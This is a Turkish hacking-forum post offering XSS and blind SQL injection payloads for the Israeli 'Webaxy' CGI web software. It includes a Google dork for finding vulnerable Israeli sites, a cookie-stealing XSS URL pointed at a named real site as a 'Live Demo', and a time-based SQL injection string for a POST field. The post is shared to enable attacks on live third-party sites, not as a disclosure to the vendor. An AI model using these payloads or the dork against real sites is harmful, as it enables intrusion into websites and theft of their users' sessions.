Konuyu Oyla:
  • Derecelendirme: 4.5/5 - 2 oy
  • 1
  • 2
  • 3
  • 4
  • 5
İsrail Script Cgi Webaxy XSS/SQL
#1
Title: Webaxy Cgi Multiple XSS/SQL Vulnerability

Date:08/09/2014

Vendor: http://www.migvan.co.il/english/info/pro...xy-010.htm

Software Link : http://www.migvan.co.il

Dork: inurl:webaxy site:il

Xss Vuln.(Stored XSS)

1-

http://www.victim.com/path//cgi-webaxy/s...act=search’"()%26%<script>alert(document.cookie)</script>&dbid=pages&f22=21&ID=717713_kmekomit&lang=he

Live Demo:

http://www.kamam.org.il//cgi-webaxy/sal/...act=search’"()%26%<script>alert(document.cookie)</script>&dbid=pages&f22=21&ID=717713_kmekomit&lang=he

2-SQL

This vulnerability affects /cgi-webaxy/new/tellme.pl.

URL encoded POST input action was set to 1’"()&%<Script >prompt(968837)</Script>

Blind SQL Vuln.

URL encoded POST input email was set to (select(0)from(select(sleep(0)))v)/*’+(select(0)from(select(sleep(0)))v)+’"+(select(0)from(select(sleep(0)))v)+"*/
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  PvP SerVer Script SqL Inj. Vulnerabilities L3on4ns 25 1,999 09-03-2016, Saat: 20:57
Son Yorum: desmond
  Yazılım Script'i Türkiye XSS Vulnerability Stallk3r 21 907 18-01-2016, Saat: 01:28
Son Yorum: archavin
  WordPress İsrail ve Fransa Arama Dorkları KingSkrupellos 1 1,463 18-09-2014, Saat: 18:46
Son Yorum: Hacker Peyami
  TopGames Script v1.2 Play.php SQL Enjeksiyon Açığı KingSkrupellos 0 331 13-09-2014, Saat: 13:51
Son Yorum: KingSkrupellos
Anahtar Kelimeler

İsrail Script Cgi Webaxy XSS/SQL indir, İsrail Script Cgi Webaxy XSS/SQL Videosu, İsrail Script Cgi Webaxy XSS/SQL Online izle, İsrail Script Cgi Webaxy XSS/SQL Bedava indir, İsrail Script Cgi Webaxy XSS/SQL Yükle, İsrail Script Cgi Webaxy XSS/SQL Hakkında, İsrail Script Cgi Webaxy XSS/SQL Nedir, İsrail Script Cgi Webaxy XSS/SQL Free indir, İsrail Script Cgi Webaxy XSS/SQL Oyunu, İsrail Script Cgi Webaxy XSS/SQL Download


1 Ziyaretçi